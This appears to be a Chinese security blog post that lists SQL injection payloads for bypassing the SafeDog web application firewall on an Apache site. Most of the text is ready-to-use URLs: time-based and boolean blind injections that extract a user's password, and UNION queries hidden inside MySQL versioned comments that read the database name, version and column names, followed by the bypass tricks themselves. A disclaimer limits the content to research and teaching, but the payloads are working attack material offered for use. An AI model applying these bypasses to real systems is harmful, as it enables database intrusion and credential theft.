前提
web页面存在注入漏洞
环境
安全狗(APACE版)V4.0 防护规则全开
绕过
1. 延时盲注
https://www.0dayhack.com/test.php?id=2' and if(substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1,sleep(5 ),1)–+
2. 布尔盲注
https://www.0dayhack.com/test.php?id=2' and substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1–+
3. 查库名/用户名
https://www.0dayhack.com/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,(/*!40000database*/()),3)– -
4. 查版本
https://www.0dayhack.com/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,{/*!f*/version()},3)– -
5. 联合查询
https://www.0dayhack.com/test.php?id=-1'union /*!40000DISTINCT*/(/*!40000select*/1,(select group_concat(column_name) from (information_schema.columns) where table_name='users'),3)– -
技巧
1.
union select 1,2,3 => union/*!40000DISTINCT*/(/*!40000select*/1,2,3)
2.
select password from => select password*1.from user => select password from (user)
3.
version() => {/*!f*/version()}
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论